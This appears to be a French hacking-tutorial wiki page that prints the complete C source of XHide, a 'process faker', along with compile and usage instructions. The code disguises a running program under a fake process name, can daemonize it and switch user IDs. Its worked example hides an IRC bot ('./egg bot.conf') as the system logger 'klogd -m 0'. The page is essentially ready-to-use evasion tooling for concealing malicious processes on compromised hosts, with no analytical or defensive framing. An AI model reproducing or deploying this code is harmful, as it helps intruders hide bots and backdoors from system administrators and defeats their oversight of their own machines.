tuto:hacking:process_faker:process_faker_-_xhide
xhide
Fichier xhide.c
gcc xhide.c -o xhide
#include <stdio.h> #include <unistd.h> #include <sys/stat.h> #include <sys/types.h> #include <string.h> #include <fcntl.h> #include <pwd.h> #include <grp.h> void usage(char *progname); int changeown (char *str) { char user[256], *group; struct passwd *pwd; struct group *grp; uid_t uid; gid_t gid; memset(user, '\0', sizeof(user)); strncpy(user, str, sizeof(user)); for (group = user; *group; group++) if (*group == ':') { *group = '\0'; group++; break; } if (pwd = getpwnam(user)) { uid = pwd->pw_uid; gid = pwd->pw_gid; } else uid = (uid_t) atoi(user); if (*group) if (grp = getgrnam(group)) gid = grp->gr_gid; else gid = (gid_t) atoi(group); if (setgid(gid)) { perror("Error: Can't set GID"); return 0; } if (setuid(uid)) { perror("Error: Can't set UID"); return 0; } return 1; } char *fullpath(char *cmd) { char *p, *q, *filename; struct stat st; if (*cmd == '/') return cmd; filename = (char *) malloc(256); if (*cmd == '.') if (getcwd(filename, 255) != NULL) { strcat(filename, "/"); strcat(filename, cmd); return filename; } else return NULL; for (p = q = (char *) getenv("PATH"); q != NULL; p = ++q) { if (q = (char *) strchr(q, ':')) *q = (char) '\0'; snprintf(filename, 256, "%s/%s", p, cmd); if (stat(filename, &st) != -1 && S_ISREG(st.st_mode) && (st.st_mode&S_IXUSR || st.st_mode&S_IXGRP || st.st_mode&S_IXOTH)) return filename; if (q == NULL) break; } free(filename); return NULL; } void usage(char *progname) { fprintf(stderr, "XHide - Process Faker, by Schizoprenic " "Xnuxer Research (c) 2002\n\nOptions:\n" "-s string\tFake name process\n" "-d\t\tRun aplication as daemon/system (optional)\n" "-u uid[:gid]\tChange UID/GID, use another user (optional)\n" "-p filename\tSave PID to filename (optional)\n\n" "Example: %s -s \"klogd -m 0\" -d -p test.pid ./egg bot.conf\n\n",progname); exit(1); } int main(int argc,char **argv) { char c; char fake[256]; char *progname, *fakename; char *pidfile, *fp; char *execst; FILE *f; int runsys=0, null; int j,i,n,pidnum; char **newargv; progname = argv[0]; if(argc<2) usage(progname); for (i = 1; i < argc; i++) { if (argv[i][0] == '-') switch (c = argv[i][1]) { case 's': fakename = argv[++i]; break; case 'u': changeown(argv[++i]); break; case 'p': pidfile = argv[++i]; break; case 'd': runsys = 1; break; default: usage(progname); break; } else break; } if (!(n = argc - i) || fakename == NULL) usage(progname); newargv = (char **) malloc(n * sizeof(char **) + 1); for (j = 0; j < n; i++,j++) newargv[j] = argv[i]; newargv[j] = NULL; if ((fp = fullpath(newargv[0])) == NULL) { perror("Full path seek"); exit(1); } execst = fp; if (n > 1) { memset(fake, ' ', sizeof(fake) - 1); fake[sizeof(fake) - 1] = '\0'; strncpy(fake, fakename, strlen(fakename)); newargv[0] = fake; } else newargv[0] = fakename; if (runsys) { if ((null = open("/dev/null", O_RDWR)) == -1) { perror("Error: /dev/null"); return -1; } switch (fork()) { case -1: perror("Error: FORK-1"); return -1; case 0: setsid(); switch (fork()) { case -1: perror("Error: FORK-2"); return -1; case 0: umask(0); close(0); close(1); close(2); dup2(null, 0); dup2(null, 1); dup2(null, 2); break; default: return 0; } break; default: return 0; } } waitpid(-1, (int *)0, 0); pidnum = getpid(); if (pidfile != NULL && (f = fopen(pidfile, "w")) != NULL) { fprintf(f, "%d\n", pidnum); fclose(f); } fprintf(stderr,"==> Fakename: %s PidNum: %d\n",fakename,pidnum); execv(execst, newargv); perror("Couldn't execute"); return -1; }
Options:
- -s string Fake name process
- -d Run aplication as daemon/system (optional)
- -u uid[:gid] Change UID/GID, use another user (optional)
- -p filename Save PID to filename (optional)
./xhide -s "klogd -m 0" -d -p test.pid ./egg bot.conf
tuto/hacking/process_faker/process_faker_-_xhide.txt · Dernière modification : 2010/11/07 22:00 de root